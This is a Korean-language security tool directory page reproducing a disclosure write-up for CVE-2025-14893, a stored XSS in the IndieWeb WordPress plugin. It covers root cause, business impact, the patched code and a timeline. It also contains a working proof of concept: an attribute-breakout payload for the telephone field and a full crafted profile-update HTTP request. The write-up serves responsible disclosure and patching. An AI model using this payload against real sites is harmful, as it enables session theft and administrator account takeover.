Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-14893 — IndieWeb 워드프레스 플러그인의 인증된 저장형 크로스 사이트 스크립팅(XSS) | Kitploit
도구/GitHubGitHub/d3kc4rt1/cve-2025-14893
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubd3kc4rt1/cve-2025-14893

CVE-2025-14893

IndieWeb 워드프레스 플러그인의 인증된 저장형 크로스 사이트 스크립팅(XSS)

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-14893: IndieWeb WordPress 플러그인의 인증된 저장형 크로스 사이트 스크립팅 (XSS)

면책 조항: 이 저장소는 교육 목적 및 윤리적 공개를 위해 생성되었습니다. 취약점은 공급업체에 책임 있게 보고되었으며 패치가 적용되었습니다. 이 정보를 승인 없이 시스템을 악용하는 데 사용하지 마십시오.

개요

IndieWeb WordPress 플러그인(버전 <= 4.0.5)에서 저장형 크로스 사이트 스크립팅(Stored XSS) 취약점이 발견되었습니다. 이 취약점은 작가(Author) 이상의 권한을 가진 인증된 공격자가 자신의 사용자 프로필 "전화번호(Telephone)" 필드에 악성 JavaScript를 주입할 수 있게 합니다.

프런트엔드에 "작가 프로필 H-카드 위젯(Author Profile H-Card Widget)"이 표시될 때, 주입된 스크립트가 적절한 이스케이프 없이 렌더링됩니다. 관리자(Administrator)와 같은 높은 권한의 사용자가 조작된 링크를 클릭하면, 해당 스크립트가 그들의 브라우저 컨텍스트에서 실행됩니다. 이로 인해 세션 하이재킹, 무단 관리 작업, 완전한 계정 탈취(ATO)가 발생할 수 있습니다.

취약점 개요

  • CVE ID: CVE-2025-14893
  • 제품: IndieWeb (WordPress 플러그인)
  • 영향받는 버전: <= 4.0.5
  • 취약점 유형: 저장형 크로스 사이트 스크립팅(XSS) (CWE-79)
  • 필요 권한: 인증됨 (작가 수준 이상)

기술 심층 분석 및 근본 원인

핵심 문제는 플러그인의 템플릿 시스템에서 사용자 메타데이터를 안전하지 않게 처리하는 데 있으며, 특히 WordPress 내장 이스케이프 함수를 사용하지 않는 데 있습니다.

취약한 파일: templates/h-card.php (27번째 줄)

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>

결함: 플러그인이 echo를 사용하여 사용자의 tel 메타데이터를 href HTML 속성 안에 직접 출력하면서 esc_attr()로 감싸지 않았습니다. 이를 통해 공격자는 큰따옴표(")를 포함한 조작된 문자열을 제공하여 href 속성을 조기에 닫고, 그 뒤에 임의의 HTML 속성(예: style 또는 onclick)을 추가할 수 있습니다.

비즈니스 영향

  • 계정 탈취(ATO): 관리자가 조작된 요소와 상호작용하면 공격자의 JavaScript가 세션 쿠키를 훔치거나 관리 AJAX 요청을 실행하여 WordPress 사이트에 대한 완전한 제어권을 얻을 수 있습니다.
  • 평판 손상: 공격자는 페이지의 보이는 요소를 수정하거나(디페이스먼트) 합법적인 방문자를 악성 타사 웹사이트로 리디렉션할 수 있습니다.

개념 증명(PoC)

전제 조건

  1. IndieWeb <= 4.0.5가 활성화된 WordPress 설치.
  2. 작가(Author) 역할의 공격자 계정.
  3. "작가 프로필 H-카드 위젯"이 보이는 프런트엔드 영역(예: 사이드바)에 추가됨.

악용 단계

  1. 작가로 WordPress 대시보드에 로그인합니다.
  2. 프로필(/wp-admin/profile.php)로 이동합니다.
  3. 전화번호 필드까지 스크롤합니다.
  4. 다음 페이로드를 주입합니다 (href 속성을 이스케이프 처리하여 벗어남):
    root@kitploit:~
    Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
    
  5. 프로필 업데이트를 클릭합니다.
  6. 중요 단계: 새 글을 작성하여 게시합니다. 취약한 위젯은 작성자의 정보를 표시하기 위해 단일 글 페이지(is_single())에서만 렌더링됩니다.
  7. 트리거: 관리자가 프런트엔드에서 게시된 글을 방문하고 새로 스타일링된 "Click_Me" 전화번호 버튼을 클릭하면 XSS 페이로드(세션 쿠키 알림)가 실행됩니다.

악성 HTTP 요청 예시 (프로필 업데이트)

root@kitploit:~
POST /wp-admin/profile.php HTTP/1.1
Host: TARGET
Content-Type: application/x-www-form-urlencoded
Cookie: [Author_Session_Cookies]

_wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile

수정 방법

이 취약점을 패치하려면 플러그인 개발자가 WordPress의 esc_attr() 및 esc_html() 함수를 사용하여 출력을 적절히 이스케이프 처리해야 합니다.

패치된 코드 예시:

root@kitploit:~
<a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>

타임라인

  • 날짜 (2026-03-03): Wordfence에 보고됨.
  • 날짜 (2026-03-20): 취약점 패치 / 공개 공개.

참조 및 크레딧

  • Wordfence 취약점 데이터베이스
  • NVD의 CVE-2025-14893
  • WordPress.org의 IndieWeb 플러그인
도구 다운로드